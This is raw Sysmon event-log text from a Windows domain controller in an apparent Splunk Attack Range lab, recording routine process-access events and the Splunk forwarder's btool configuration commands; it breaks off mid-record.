15:51:19.738{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002075Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.738{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7C77-5FA1-5B00-000000008801}4016C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002074Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.738{D28789B6-7C77-5FA1-5A00-000000008801}39883992C:\Windows\system32\cmd.exe{D28789B6-7C77-5FA1-5B00-000000008801}4016C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002073Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.738{D28789B6-7C77-5FA1-5B00-000000008801}4016C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{D28789B6-7C77-5FA1-5A00-000000008801}3988C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000002072Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.722{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C77-5FA1-5A00-000000008801}3988C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002071Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.722{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002070Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.722{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002069Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.722{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002068Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.722{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002067Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.722{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002066Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.722{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002065Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.722{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002064Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.722{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002063Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.722{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002062Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.722{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7C77-5FA1-5A00-000000008801}3988C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002061Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.722{D28789B6-7C75-5FA1-4D00-000000008801}40324028C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{D28789B6-7C77-5FA1-5A00-000000008801}3988C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18319|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002060Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.733{D28789B6-7C77-5FA1-5A00-000000008801}3988C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7C75-5FA1-4D00-000000008801}4032C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002059Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.706{D28789B6-7C77-5FA1-5900-000000008801}31083940C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002058Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.456{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C77-5FA1-5900-000000008801}3108C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002057Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.456{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002056Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.456{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002055Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.456{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002054Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.456{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002053Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.456{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002052Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.456{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002051Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.456{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002050Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.456{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002049Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.456{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7C77-5FA1-5900-000000008801}3108C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002048Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 